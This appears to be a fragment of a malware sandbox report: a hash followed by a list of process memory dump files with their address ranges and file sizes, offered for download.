3a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42

Download Submit
memory/232-41-0x00000000001A0000-0x00000000001C8000-memory.dmp

Filesize
160KB

Download
memory/1804-36-0x0000000000140000-0x000000000016E000-memory.dmp

Filesize
184KB

Download
memory/3116-57-0x0000000005EC0000-0x0000000005F5C000-memory.dmp

Filesize
624KB

Download
memory/3116-58-0x0000000005E00000-0x0000000005E0A000-memory.dmp

Filesize
40KB

Download
memory/3116-56-0x0000000005D60000-0x0000000005DF2000-memory.dmp

Filesize
584KB

Download
memory/3116-55-0x00000000063D0000-0x0000000006974000-memory.dmp

Filesize
5.6MB

Download
memory/3116-54-0x0000000000F50000-0x0000000001388000-memory.dmp

Filesize
4.2MB

Download
memory/3340-0-0x00007FFCCF6B3000-0x00007FFCCF6B5000-memory.dmp

Filesize
8KB

Download
memory/3340-1-0x00000000001F0000-0x00000000006F8000-memory.dmp

Filesize
5.0MB

Download
memory/4988-65-0x0000020EA0530000-0x0000020EA0552000-memory.dmp

Filesize
136KB

Download
memory/5092-38-0x00007FFCCF6B0000-0x00007FFCD0171000-memory.dmp

Filesize
10.8MB

Download
memory/5092-191-0x00007FFCCF6B0000-0x00007FFCD0171000-memory.dmp

Filesize
10.8MB

Download
memory/5092-16-0x0000000000A90000-0x0000000000ABC000-memory.dmp

Filesize
176KB

Download
memory/5092-204-0x00007FFCCF6B0000-0x00007FFCD0171000-memory.dmp

Filesize
10.8MB

Download
memory/5092-205-0x00007FFCCF6B0000-0x00007FFCD0171000-memory.dmp

Filesize
10.8MB

Download